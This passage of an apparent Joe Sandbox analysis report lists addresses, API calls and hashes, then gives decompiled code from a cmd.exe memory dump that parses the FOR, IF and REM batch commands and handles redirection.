0x00d8c77f
0x00d8c77f
0x00000000
0x00d8c77f
0x00d9aeb1
0x00d9aeb4
0x00d9aeb7
0x00d9aeb9
0x00d9aec5
0x00d9aebb
0x00d9aebb
0x00d9aec0
0x00d9aec0
0x00d9aeca
0x00d9aecd
0x00d9aece
0x00d9aed2
0x00000000
0x00d9aed2
0x00d8c764
0x00d8c765
0x00d8c76a
0x00d8c76f
0x00d8c770
0x00d8c771
0x00d8c772
0x00d8c777
0x00d8c77d
0x00000000
0x00d8c77d

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,?,00000000,00DBB980,00002000,00000000,00000000,?,00000000), ref: 00D8C735

Part of subcall function 00D8D7D4: wcschr.MSVCRT ref: 00D8D7DA

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,?,00000000,00DBB980,00002000,?), ref: 00D8C777
_ultoa.MSVCRT ref: 00D9AF0E
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00D9AF17
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,?,000000FF,?,00000020), ref: 00D9AF38

Strings

System, xrefs: 00D9AF51
Application, xrefs: 00D9AF44

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
String ID: Application$System
API String ID: 3538039442-3455788185
Opcode ID: 7b908b2a13a872883fd38d95efc0c3105381e329cad3fb97c480288adbba3624
Instruction ID: 0e343fe1a586f59699163866e7fdc1843684587facb2d82f361ff16d5fcd6be7
Opcode Fuzzy Hash: 7b908b2a13a872883fd38d95efc0c3105381e329cad3fb97c480288adbba3624
Instruction Fuzzy Hash: 4241837274031AAFDF109B68CC5DFAEBA69EB45751F240115F646EB280D7709D00CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00D904A0, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00D904A0(signed int __eax, void* __ebx, void* __edx, void* __edi) {
				signed int _v4;
				WCHAR* _v8;
				long* _v12;
				long _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				char _v544;
				WCHAR* _v548;
				WCHAR* _v552;
				WCHAR* __esi;
				signed int _t106;
				short _t107;
				void* _t112;
				signed int _t115;
				void* _t117;
				WCHAR** _t119;
				short _t120;
				signed int _t124;
				signed short* _t125;
				WCHAR* _t129;

				_t117 = __ebx;
				_t106 = __eax;
				if( *0xdbfa90 != 0x4000) {
					_t107 =  *0xdbfaa0;
					__eflags = _t107 - 0x28;
					if(_t107 != 0x28) {
						__eflags = _t107 - 0x40;
						if(_t107 == 0x40) {
							goto L140;
						} else {
							goto L150;
						}
					} else {
						L140:
						_t119 = 0x50;
						_t129 = E00D900B0(0x50);
						__eflags = _t129;
						if(_t129 == 0) {
							E00DA9287(0x50);
							__imp__longjmp(0xdbb8b8, 1);
							asm("int3");
							_t106 =  *0x50 & 0x0000ffff;
							_t124 = _t106;
							__eflags = _t106;
							if(_t106 != 0) {
								_t106 = 0;
								__eflags = 0;
								do {
									_t125 = _t119;
									_t119 = _t119 + _t129;
									__eflags =  *_t119;
								} while ( *_t119 != 0);
								_t124 =  *_t125 & 0x0000ffff;
							}
							__eflags = _t124 - 0x3a;
							if(_t124 != 0x3a) {
								 *0xdad55c = 3;
							}
							return _t106;
						} else {
							__eflags =  *0xdbfaa0 - 0x28;
							if( *0xdbfaa0 != 0x28) {
								 *_t129 = 0x3b;
								_t120 = 0;
							} else {
								 *_t129 = 0x33;
								do {
									_t115 = E00D8F030(0x10);
									__eflags =  *0xdbfaa0 - 0xa;
								} while ( *0xdbfaa0 == 0xa);
								__eflags = 0;
								E00D8F300(_t115, 0, 0, 0);
								_t120 = 0x33;
							}
							_t129[0x1c] = E00D8DC74(_t117, _t120);
							__eflags =  *_t129 - 0x3b;
							if( *_t129 == 0x3b) {
								L147:
								return _t129;
							} else {
								_t112 = E00D8F030(0x10);
								__eflags = _t112 - 0x29;
								if(_t112 != 0x29) {
									L150:
									E00DA82EB(0x10);
									__eflags = 0;
									return 0;
								} else {
									goto L147;
								}
							}
						}
					}
				} else {
					__imp___wcsicmp(L"FOR", 0xdbfaa0);
					__esp = __esp + 8;
					__eflags = __eax;
					if(__eax == 0) {
						L152:
						_pop(__esi);
						__edi = 0;
						__imp___wcsicmp(L"FOR/?", __edi, __esi);
						_pop(__ecx);
						__ecx = 0xdbfaa0;
						__eflags = __eax;
						if(__eflags == 0) {
							__eax = 0;
							__edi = 0;
							 *0xdbfaa6 = __ax;
							__edi = 1;
						}
						__ecx = 0x2b;
						 *0xdbfa8c = 0x1e;
						__esi = E00D8E9A0(__ecx, __eflags);
						__eax = 0x2f;
						__eflags = __edi;
						if(__edi != 0) {
							 *0xdbfaa0 = __ax;
							__eax = 0x3f;
							 *0xdbfaa2 = __ax;
							__eax = 0;
							 *0xdbfaa4 = __ax;
						} else {
							__ecx = 0;
							__eflags = 0;
							__eax = E00D8F030(0);
						}
						__edx = 0x2b;
						__eax = E00D8DCE1(__ebx, __edx, __edi);
						__eflags = __al;
						if(__al != 0) {
							__esi[0x1c] = __esi[0x1c] & 0x00000000;
							 *__esi = 0x3c;
						} else {
							__esi[0x24] = __esi[0x24] & 0x00000000;
							__eflags =  *0xdc3cc9;
							__eax = 0x25;
							if( *0xdc3cc9 != 0) {
								__edi = 0;
								__edi = 1;
								__eflags = 1;
								while(1) {
									__imp___wcsicmp(L"/L");
									_pop(__ecx);
									__ecx = 0xdbfaa0;
									__eflags = __eax;
									if(__eax == 0) {
										goto L32;
									}
									L9:
									__imp___wcsicmp(L"/D");
									_pop(__ecx);
									__ecx = 0xdbfaa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000002;
										L27:
										__ecx = 0;
										__eax = E00D8F030(0);
										while(1) {
											__imp___wcsicmp(L"/L");
											_pop(__ecx);
											__ecx = 0xdbfaa0;
											__eflags = __eax;
											if(__eax == 0) {
												goto L32;
											}
											goto L9;
										}
										goto L32;
									}
									__imp___wcsicmp(L"/F");
									_pop(__ecx);
									__ecx = 0xdbfaa0;
									__eflags = __eax;
									if(__eax == 0) {
										__esi[0x24] = __esi[0x24] | 0x00000008;
										__ecx = 0;
										__eax = E00D8F030(0);
										__ax =  *0xdbfaa0;
										__ecx = 0x25;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											continue;
										} else {
											__ecx = 0x2f;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__eflags = __esi[0x26];
												if(__esi[0x26] != 0) {
													__eax = E00DA82EB(__ecx);
												}
												__eax =  *0xdbfa8c;
												__ecx = 6 +  *0xdbfa8c * 2;
												__eax = E00D900B0(__ecx);
												__eflags = __eax;
												if(__eax == 0) {
													goto L212;
												} else {
													__edx =  *0xdbfa8c;
													__edx =  &(( *0xdbfa8c)[1]);
													goto L26;
												}
											}
										}
										goto L218;
									} else {
										__imp___wcsicmp(L"/R");
										_pop(__ecx);
										__ecx = 0xdbfaa0;
										__ecx = __esi[0x24];
										__eflags = __eax;
										if(__eax == 0) {
											__esi[0x24] = __ecx;
											__ecx = 0;
											__eax = E00D8F030(0);
											__eflags = __esi[0x26];
											if(__esi[0x26] != 0) {
												__eax = E00DA82EB(__ecx);
											}
											__ax =  *0xdbfaa0;
											__ecx = 0x25;
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												continue;
											} else {
												__ecx = 0x2f;
												__eflags = __ax - __cx;
												if(__ax == __cx) {
													continue;
												} else {
													__eax =  *0xdbfa8c;
													__ecx = 2 +  *0xdbfa8c * 2;
													__eax = E00D900B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														L212:
														__eax = E00DA9287(__ecx);
														__imp__longjmp(0xdbb8b8, __edi);
														goto L213;
													} else {
														__edx =  *0xdbfa8c;
														__edx =  &(( *0xdbfa8c)[0]);
														L26:
														__ecx = __eax;
														__esi[0x26] = __eax;
														__eax = E00D91040(__eax, __edx, 0xdbfaa0);
														goto L27;
													}
												}
											}
											goto L218;
										} else {
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 8;
												if(__ecx != 8) {
													__eflags = __ecx - 2;
													if(__ecx != 2) {
														__eflags = __ecx - __edi;
														if(__ecx != __edi) {
															L213:
															__eflags = __ecx - 6;
															if(__ecx != 6) {
																__eflags = __ecx - 4;
																if(__ecx != 4) {
																	__eax = E00DA82EB(__ecx);
																}
															}
														}
													}
												}
											}
										}
									}
									__eax = 0x25;
									goto L15;
									L32:
									__esi[0x24] = __esi[0x24] | __edi;
									goto L27;
								}
							}
							L15:
							__eflags =  *0xdbfaa0 - __ax;
							if( *0xdbfaa0 != __ax) {
								L216:
								__eax = E00DA82EB(__ecx);
							} else {
								__eax =  *0xdbfaa2 & 0x0000ffff;
								__eax = iswspace( *0xdbfaa2 & 0x0000ffff);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									goto L216;
								} else {
									__edx =  *0xdbfaa2 & 0x0000ffff;
									__ecx = L"=,;";
									__esi[0x22] = __edx;
									__eax = E00D8D7D4(__ecx, __edx);
									__eflags = __eax;
									if(__eax != 0) {
										goto L216;
									} else {
										__eflags =  *0xdbfa8c - 3;
										if( *0xdbfa8c != 3) {
											goto L216;
										}
									}
								}
							}
							__ecx = __esi[0x1c];
							__edi = 0xdbfaa0;
							_push(0xdbfaa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E00D89C73(__ecx, __edx);
							__ecx = L"IN";
							__eax = E00D89C4D(L"IN");
							__ecx = __esi[0x1c];
							_push(0xdbfaa0);
							_push(__ecx);
							__edx = 0x1e;
							__eax = E00D89C73(__ecx, __edx);
							__eax = E00D89936(__ebx);
							__ecx = L"DO";
							__esi[0x1e] = __eax;
							__eax = E00D89C4D(L"DO");
							__ecx = __esi[0x1c];
							_push(0xdbfaa0);
							__ecx = __esi[0x1c] + 0x2c;
							__edx = 8;
							__eax = E00D91040(__esi[0x1c] + 0x2c, __edx);
							__ecx = 0x2b;
							__eax = E00D8DC74(__ebx, __ecx);
							__esi[0x20] = __eax;
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E00DA82EB(__ecx);
							}
						}
						_pop(__edi);
						__eax = __esi;
						_pop(__esi);
						return __esi;
					} else {
						__imp___wcsicmp(L"FOR/?", 0xdbfaa0);
						__esp = __esp + 8;
						__eflags = __eax;
						if(__eax == 0) {
							goto L152;
						} else {
							__imp___wcsicmp(L"IF", 0xdbfaa0);
							__esp = __esp + 8;
							__eflags = __eax;
							if(__eax == 0) {
								L148:
								_pop(__esi);
								__edi = 0;
								__imp___wcsicmp(L"IF/?", __edi, __esi, __ecx);
								_pop(__ecx);
								__ecx = 0xdbfaa0;
								__eflags = __eax;
								if(__eflags == 0) {
									__eax = 0;
									__edi = 0;
									 *0xdbfaa4 = __ax;
									__edi = 1;
								}
								__ecx = 0x2c;
								__esi = E00D8E9A0(__ecx, __eflags);
								__eflags = __edi;
								if(__edi != 0) {
									__eax = 0x2f;
									 *0xdbfaa0 = __ax;
									__eax = 0x3f;
									 *0xdbfaa2 = __ax;
									__eax = 0;
									 *0xdbfaa4 = __ax;
								} else {
									__ecx = 0;
									__eflags = 0;
									__eax = E00D8F030(0);
								}
								__edx = 0x2c;
								__eax = E00D8DCE1(__ebx, __edx, __edi);
								__eflags = __al;
								if(__al != 0) {
									__esi[0x1c] = __esi[0x1c] & 0x00000000;
									 *__esi = 0x3c;
									goto L47;
								} else {
									__edi = 0;
									__eflags =  *0xdc3cc9 - __al;
									if( *0xdc3cc9 == __al) {
										L40:
										__edx = 0;
										__ecx = 0;
										__eflags = 0;
										__eax = E00D8F300(__eax, 0, 0, 0);
									} else {
										__imp___wcsicmp(L"/I");
										__ecx = 0xdbfaa0;
										_pop(__ecx);
										__eflags = __eax;
										if(__eax == 0) {
											__edi = 0;
											__edi = 1;
										} else {
											goto L40;
										}
									}
									__ecx = 0;
									__eax = E00D8CDA2(0);
									__esi[0x1e] = __eax;
									__eflags = __eax;
									if(__eax != 0) {
										__eflags = __edi;
										if(__edi != 0) {
											__eflags =  *__eax - 0x38;
											if( *__eax == 0x38) {
												__eax = __eax[0x1e];
											}
											__eax[0x20] = 2;
										}
									}
									__ecx = 0x2c;
									__eax = E00D8DC74(__ebx, __ecx);
									__esi[0x20] = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00DA82EB(__ecx);
									}
									__eax = E00D8EEC8();
									__eflags = __eax;
									if(__eax == 0) {
										L47:
										_pop(__edi);
										__eax = __esi;
										_pop(__esi);
										_pop(__ecx);
										return __esi;
									} else {
										__ecx = 0;
										__eax = E00D8F030(0);
										__edi = 0xdbfaa0;
										__imp___wcsicmp(L"ELSE");
										_pop(__ecx);
										__ecx = 0xdbfaa0;
										__eflags = __eax;
										if(__eax == 0) {
											__eax =  *0xdbfa8c;
											__ecx =  *0xdbfa8c +  *0xdbfa8c;
											__eax = E00D900B0(__ecx);
											__eflags = __eax;
											if(__eax == 0) {
												__eax = E00DA9287(__ecx);
												__imp__longjmp(0xdbb8b8, 1);
												asm("int3");
												while(1) {
													L165:
													__eax = 0;
													__edx[__ecx] = __ax;
													while(1) {
														__eax = __esi[0xa];
														__esi = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															break;
														}
														__ecx = __esi[2];
														__edi = __ecx;
														__edx =  &(__edi[1]);
														do {
															__ax =  *__edi;
															__edi =  &(__edi[1]);
															__eflags = __ax - __bx;
														} while (__ax != __bx);
														__edi = __edi - __edx;
														__edi = __edi >> 1;
														__eax = E00D922C0(__ebx, __ecx);
														__ecx = __esi[2];
														__edx =  &(__edi[0]);
														__eax = E00D91040(__esi[2], __edx, __eax);
														__eflags = __esi[4] - __ebx;
														if(__esi[4] == __ebx) {
															__edx = __esi[2];
															__ecx = __edx;
															__edi =  &(__ecx[1]);
															do {
																__ax =  *__ecx;
																__ecx =  &(__ecx[1]);
																__eflags = __ax - __bx;
															} while (__ax != __bx);
															__ecx = __ecx - __edi;
															__ecx = __ecx >> 1;
															__ecx = __ecx - 1;
															__eflags = __ecx - 1;
															if(__ecx > 1) {
																__eflags = __edx[__ecx] - 0x3a;
																if(__edx[__ecx] == 0x3a) {
																	goto L165;
																}
															}
														}
													}
													__edi = _v552;
													__esi = _v548;
													__eflags = __esi - 3;
													if(__esi == 3) {
														__eax =  *0xdc3cd4;
														_v552 = __eax;
														goto L67;
													} else {
														__ecx = 0x10;
														__eax = E00D900B0(__ecx);
														_v552 = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															L86:
															__ebx = 0;
															__ebx = 1;
														} else {
															__ecx =  *0xdc3cd4;
															__eax[6] =  *0xdc3cd4;
															 *0xdc3cd4 = __eax;
															__eax[4] = __edi;
															 *__eax = __esi;
															L67:
															__edi = __edi[0x1a];
															__eflags = __edi;
															if(__edi != 0) {
																__esi = __esi | 0xffffffff;
																__eflags = __esi;
																do {
																	__eflags = __edi[4] - __ebx;
																	if(__edi[4] != __ebx) {
																		goto L82;
																	} else {
																		__imp___get_osfhandle( *__edi);
																		_pop(__ecx);
																		__eflags = __eax - __esi;
																		if(__eax == __esi) {
																			L170:
																			__edi[4] = __esi;
																			goto L75;
																		} else {
																			__imp___get_osfhandle( *__edi);
																			_pop(__ecx);
																			__eflags = __eax - 0xfffffffe;
																			if(__eax == 0xfffffffe) {
																				goto L170;
																			} else {
																				__ecx =  *__edi;
																				__eax = E00D90178(__eax);
																				__eflags = __eax;
																				if(__eax == 0) {
																					__ecx =  *__edi;
																					__eax = E00DA9953(__eax,  *__edi);
																					__eflags = __eax;
																					if(__eax != 0) {
																						goto L73;
																					} else {
																						__imp___get_osfhandle( *__edi, __ebx, __ebx, 1);
																						_pop(__ecx);
																						__eax = SetFilePointer(__eax, ??, ??, ??);
																						__eflags = __eax - __esi;
																						if(__eax != __esi) {
																							goto L73;
																						} else {
																							__esi = 0xdc3d00;
																							__eax = E00D9274C(0xdc3d00, 0x104, L"%d",  *__edi);
																							_push(0xdc3d00);
																							_push(1);
																							_push(0x40002721);
																							goto L182;
																						}
																					}
																				} else {
																					L73:
																					__ecx =  *__edi;
																					__eax = E00D8DBCE(__eax,  *__edi);
																					__edi[4] = __eax;
																					__eflags = __eax - __esi;
																					if(__eax == __esi) {
																						__esi = 0xdc3d00;
																						__eax = E00D9274C(0xdc3d00, 0x104, L"%d",  *__edi);
																						_push(0xdc3d00);
																						_push(1);
																						_push(0x2344);
																						L182:
																						__eax = E00D8C5A2(__ecx);
																						__esp = __esp + 0x1c;
																						__edi[4] = __ebx;
																						__eax = E00D8D937();
																						goto L86;
																					} else {
																						__ecx =  *__edi;
																						__eax = E00D8DB92( *__edi);
																						L75:
																						__ecx = __edi[2];
																						__eflags =  *__ecx - 0x26;
																						if( *__ecx == 0x26) {
																							__eax = 0;
																							__ecx[2] = __ax;
																							__eax = __edi[2];
																							__edx =  *__edi;
																							__ecx = __eax[1] & 0x0000ffff;
																							__ecx = (__eax[1] & 0x0000ffff) - 0x30;
																							__eax = E00D8DBFC((__eax[1] & 0x0000ffff) - 0x30, __edx);
																							__eflags = __eax - __esi;
																							if(__eax != __esi) {
																								goto L82;
																							} else {
																								goto L183;
																							}
																						} else {
																							__eflags = __edi[8] - 0x3c;
																							_push(__ecx);
																							if(__edi[8] == 0x3c) {
																								__edx = 0x8000;
																								__eax = E00D8D120(__ecx, 0x8000);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax != __esi) {
																									goto L79;
																								} else {
																									__ecx = L"DPATH";
																									__eax = E00D93320(L"DPATH");
																									__eflags = __eax;
																									if(__eax == 0) {
																										goto L184;
																									} else {
																										__ecx = _v24;
																										__eflags = __ecx;
																										if(__ecx == 0) {
																											__ecx =  &_v544;
																										}
																										__eax = SearchPathW(__eax, __edi[2], __ebx, _v16, __ecx, __ebx);
																										__eflags = __eax;
																										if(__eax == 0) {
																											goto L184;
																										} else {
																											__ecx = _v24;
																											__eflags = __ecx;
																											if(__ecx == 0) {
																												__ecx =  &_v544;
																											}
																											_push(__ecx);
																											__edx = 0x8000;
																											goto L78;
																										}
																									}
																								}
																							} else {
																								__edi[6] =  ~(__edi[6]);
																								asm("sbb edx, edx");
																								__edx =  ~(__edi[6]) & 0xfffffe09;
																								__edx = ( ~(__edi[6]) & 0xfffffe09) + 0x301;
																								__eflags = __edx;
																								L78:
																								__eax = E00D8D120(__ecx, __edx);
																								_v548 = __eax;
																								__eflags = __eax - __esi;
																								if(__eax == __esi) {
																									L184:
																									__eax = E00D8D937();
																									__ecx =  *0xdc3cf0;
																									__eax = E00DA985A( *0xdc3cf0);
																									goto L86;
																								} else {
																									L79:
																									__eflags = __eax -  *__edi;
																									if(__eax !=  *__edi) {
																										__edx =  *__edi;
																										__ecx = __eax;
																										__eax = E00D8DBFC(__eax,  *__edi);
																										__ecx = _v548;
																										__esi = __eax;
																										__eax = E00D8DB92(_v548);
																										__eflags = __esi - 0xffffffff;
																										if(__esi == 0xffffffff) {
																											L183:
																											__eax = E00D8D937();
																											__esi = 0xdc3d00;
																											E00D9274C(0xdc3d00, 0x104, L"%d",  *__edi) = E00D8C5A2(__ecx, 0x2344, 1, 0xdc3d00);
																											goto L86;
																										} else {
																											__eax =  *__edi;
																											__esi = __esi | 0xffffffff;
																											goto L80;
																										}
																									} else {
																										L80:
																										__eflags = __eax - __esi;
																										if(__eax == __esi) {
																											goto L184;
																										} else {
																											__ecx = _v552;
																											_v552[2] = __eax;
																											goto L82;
																										}
																									}
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																	goto L83;
																	L82:
																	__eax = __edi[0xa];
																	__edi = __eax;
																	__eflags = __eax;
																} while (__eax != 0);
															}
														}
													}
													L83:
													__imp__??_V@YAXPAX@Z(_v24);
													_pop(__ecx);
													__ecx = _v4;
													__eax = __ebx;
													_pop(__edi);
													_pop(__esi);
													__ecx = _v4 ^ __ebp;
													__eflags = __ecx;
													_pop(__ebx);
													__eax = E00D96FD0(__ebx, __ebx, __ecx, __edx, __edi, __esi);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
													goto L218;
												}
											} else {
												__edx =  *0xdbfa8c;
												__ecx = __eax;
												__esi[0x22] = __eax;
												__eax = E00D91040(__eax,  *0xdbfa8c, 0xdbfaa0);
												__ecx = 0x2c;
												__eax = E00D8DC74(__ebx, __ecx);
												__esi[0x24] = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													__eax = E00DA82EB(__ecx);
												}
												goto L47;
											}
										} else {
											__edx = 0;
											__ecx = 0;
											__eflags = 0;
											__eax = E00D8F300(__eax, 0, 0, 0);
											goto L47;
										}
									}
								}
							} else {
								__imp___wcsicmp(L"IF/?", 0xdbfaa0);
								__esp = __esp + 8;
								__eflags = __eax;
								if(__eax == 0) {
									goto L148;
								} else {
									__imp___wcsicmp(L"REM", 0xdbfaa0);
									__esp = __esp + 8;
									__eflags = __eax;
									if(__eax == 0) {
										L138:
										_pop(__esi);
										__edi = 0;
										__imp___wcsicmp(L"REM/?", __edi, __esi, __ecx);
										_pop(__ecx);
										__ecx = 0xdbfaa0;
										__eflags = __eax;
										if(__eflags == 0) {
											__eax = 0;
											__edi = 0;
											 *0xdbfaa6 = __ax;
											__edi = 1;
										}
										__ecx = 0x2d;
										__esi = E00D8E9A0(__ecx, __eflags);
										__eflags = __edi;
										if(__edi != 0) {
											__eax = 0x2f;
											 *0xdbfaa0 = __ax;
											__eax = 0x3f;
											 *0xdbfaa2 = __ax;
											__eax = 0;
											 *0xdbfaa4 = __ax;
										} else {
											__ecx = 0;
											__eflags = 0;
											__eax = E00D8F030(0);
										}
										__edx = 0x2d;
										__eax = E00D8DCE1(__ebx, __edx, __edi);
										__eflags = __al;
										if(__al != 0) {
											__esi[0x1c] = __esi[0x1c] & 0x00000000;
											 *__esi = 0x3c;
											goto L95;
										} else {
											__edx = 0;
											__ecx = 0;
											__eax = E00D8F300(__eax, 0, 0, 0);
											__eax = E00D8EEC8();
											__eflags = __eax;
											if(__eax == 0) {
												L95:
												_pop(__edi);
												__eax = __esi;
												_pop(__esi);
												_pop(__ecx);
												return __esi;
											} else {
												__ecx = 0x20;
												__eax = E00D8F030(__ecx);
												__eflags = __eax - 0x4000;
												if(__eax != 0x4000) {
													__edx = 0;
													__ecx = 0;
													__eax = E00D8F300(__eax, 0, 0, 0);
													goto L95;
												} else {
													__eax =  *0xdbfa8c;
													__ecx =  *0xdbfa8c +  *0xdbfa8c;
													__eax = E00D900B0(__ecx);
													__eflags = __eax;
													if(__eax == 0) {
														__eax = E00DA9287(__ecx);
														__imp__longjmp(0xdbb8b8, 1);
														asm("int3");
														__eflags = __esi;
														if(__esi != 0) {
															__eax = 0;
															 *__ebx = __ax;
														}
														_pop(__edi);
														_pop(__esi);
														__eax = __ebx;
														_pop(__ebx);
														return __ebx;
													} else {
														__edx =  *0xdbfa8c;
														__ecx = __eax;
														__esi[0x1e] = __eax;
														__eax = E00D91040(__eax,  *0xdbfa8c, 0xdbfaa0);
														goto L95;
													}
												}
											}
										}
									} else {
										__imp___wcsicmp(L"REM/?", 0xdbfaa0);
										__esp = __esp + 8;
										__eflags = __eax;
										if(__eax == 0) {
											goto L138;
										} else {
											_pop(__esi);
											_push(__ebp);
											__ebp = __esp;
											__esp = __esp - 0x14;
											_push(__ebx);
											_push(__esi);
											__eax =  &_v16;
											_v16 = 0;
											_push(__edi);
											__ecx = 0;
											__eflags = 0;
											_v12 =  &_v16;
											__ebx = E00D8E9A0(0, 0);
											_v20 = __ebx;
											while(1) {
												__eax = E00D8EEC8();
												__eflags = __eax;
												if(__eax == 0) {
													break;
												}
												__ecx = 1;
												__eax = E00D8F030(1);
												__eflags = __eax - 0x4000;
												if(__eax == 0x4000) {
													__ecx = __ebx[0x1e];
													__edi =  *0xdbfa8c;
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx =  &(__ecx[1]);
														do {
															__ax =  *__ecx;
															__ecx =  &(__ecx[1]);
															__eflags = __ax;
														} while (__ax != 0);
														__ecx = __ecx - __edx;
														__edi = __edi + __ecx;
													}
													__ecx = __edi + __edi;
													__esi = E00D900B0(__ecx);
													_v8 = __esi;
													__eflags = __esi;
													if(__esi == 0) {
														__eax = E00DA9287(__ecx);
														__imp__longjmp(0xdbb8b8, 1);
														asm("int3");
														__eflags =  *0xdbfa90;
														if( *0xdbfa90 != 0) {
															__eax = E00DA82EB(__ecx);
														}
														__eax = 0;
														__eflags = 0;
														__eflags =  *0xdbfa88;
														 *0xdad5c8 = 0;
														if( *0xdbfa88 != 0) {
															__edx = 0;
															__ecx = __esi;
															__eax = E00DA8121(__esi, 0);
														}
														__eax = __esi;
														_pop(__edi);
														_pop(__esi);
														_pop(__ebx);
														_pop(__ebp);
														return __eax;
													} else {
														__ecx = __ebx[0x1e];
														__eflags = __ecx;
														if(__ecx != 0) {
															__edx = __edi;
															__ecx = __esi;
															__eax = E00D91040(__esi, __edi, __esi);
														}
														__eax = 0;
														__eflags = __edi;
														if(__edi == 0) {
															L195:
															__eax = 0x80070057;
														} else {
															__eflags = __edi - 0x7fffffff;
															if(__edi > 0x7fffffff) {
																goto L195;
															}
														}
														__eflags = __eax;
														if(__eax < 0) {
															L198:
															__edx = 0;
														} else {
															__eax = 0;
															__ecx = __edi;
															__edx = __esi;
															__eflags = __edi;
															if(__edi == 0) {
																L197:
																__eax = 0x80070057;
																goto L198;
															} else {
																while(1) {
																	__eflags =  *__edx - __ax;
																	if( *__edx == __ax) {
																		break;
																	}
																	__edx =  &(__edx[1]);
																	__ecx = __ecx - 1;
																	__eflags = __ecx;
																	if(__ecx != 0) {
																		continue;
																	} else {
																		goto L197;
																	}
																	goto L114;
																}
																__eflags = __ecx;
																if(__ecx == 0) {
																	goto L197;
																} else {
																	__edx = __edi;
																	__edx = __edi - __ecx;
																	__eflags = __edx;
																}
															}
														}
														L114:
														__eflags = __eax;
														if(__eax >= 0) {
															__eax = _v8;
															__esi = __edi;
															__eax =  &(_v8[__edx]);
															__esi = __edi - __edx;
															__eflags = __esi;
															if(__esi == 0) {
																L120:
																__eax = __eax - 2;
															} else {
																__ecx = __esi;
																__edx =  &(__edx[0x3fffffff]);
																__ecx = __esi - __edi;
																__edi = 0xdbfaa0;
																__edx = __edx + __ecx;
																__edi = 0xdbfaa0 - __eax;
																__eflags = 0xdbfaa0;
																while(1) {
																	__eflags = __edx;
																	if(__edx == 0) {
																		break;
																	}
																	__ecx =  *(__edi + __eax) & 0x0000ffff;
																	__eflags = __cx;
																	if(__cx == 0) {
																		break;
																	} else {
																		 *__eax = __cx;
																		__edx = __edx - 1;
																		__eax =  &(__eax[1]);
																		__esi = __esi - 1;
																		__eflags = __esi;
																		if(__esi != 0) {
																			continue;
																		} else {
																			goto L120;
																		}
																	}
																	goto L122;
																}
																__eflags = __esi;
																if(__esi == 0) {
																	goto L120;
																}
															}
															L122:
															__esi = _v8;
															__ecx = 0;
															__eflags = 0;
															 *__eax = __cx;
														}
														__ebx[0x1e] = __esi;
														continue;
													}
												} else {
													__esi = _v12;
													__ecx = __esi;
													__eax = E00D902B0(__ebx, __esi, __edi, __esi);
													__eflags = __eax;
													if(__eax != 0) {
														__eax =  *__esi;
														do {
															_t77 =  &(__eax[0xa]); // 0x14
															__ebx = _t77;
															__eax =  *__ebx;
															_v12 = __ebx;
															__eflags = __eax;
														} while (__eax != 0);
														__ebx = _v20;
														continue;
													} else {
														__edx = 0;
														__ecx = 0;
														__eflags = 0;
														__eax = E00D8F300(__eax, 0, 0, __eax);
														break;
													}
												}
												goto L218;
											}
											__eax = _v16;
											_pop(__edi);
											__ebx[0x1a] = _v16;
											__eax = __ebx;
											_pop(__esi);
											_pop(__ebx);
											__esp = __ebp;
											_pop(__ebp);
											return __ebx;
										}
									}
								}
							}
						}
					}
				}
				L218:
			}

0x00d904a0
0x00d904a0
0x00d904ab
0x00d90557
0x00d9055d
0x00d90561
0x00d905da
0x00d905de
0x00000000
0x00000000
0x00000000
0x00000000
0x00d90563
0x00d90563
0x00d90563
0x00d9056d
0x00d9056f
0x00d90571
0x00d9852b
0x00d98537
0x00d9853d
0x00d9853e
0x00d98541
0x00d98543
0x00d98546
0x00d98548
0x00d98548
0x00d9854a
0x00d9854a
0x00d9854c
0x00d9854e
0x00d9854e
0x00d98553
0x00d98553
0x00d98556
0x00d9855a
0x00d98560
0x00d98560
0x00d8480e
0x00d90577
0x00d90577
0x00d9057f
0x00d905e9
0x00d905ef
0x00d90581
0x00d90581
0x00d90590
0x00d90595
0x00d9059a
0x00d9059a
0x00d905a8
0x00d905aa
0x00d905af
0x00d905af
0x00d905b9
0x00d905bc
0x00d905bf
0x00d905d0
0x00d905d3
0x00d905c1
0x00d905c6
0x00d905cb
0x00d905ce
0x00d905e0
0x00d905e0
0x00d905e5
0x00d905e8
0x00000000
0x00000000
0x00000000
0x00d905ce
0x00d905bf
0x00d90571
0x00d904b1
0x00d904bb
0x00d904c1
0x00d904c4
0x00d904c6
0x00d905f3
0x00d905f3
0x00d89a34
0x00d89a36
0x00d89a3c
0x00d89a3d
0x00d89a3e
0x00d89a40
0x00da1093
0x00da1095
0x00da1097
0x00da109d
0x00da109d
0x00d89a48
0x00d89a49
0x00d89a58
0x00d89a5c
0x00d89a5d
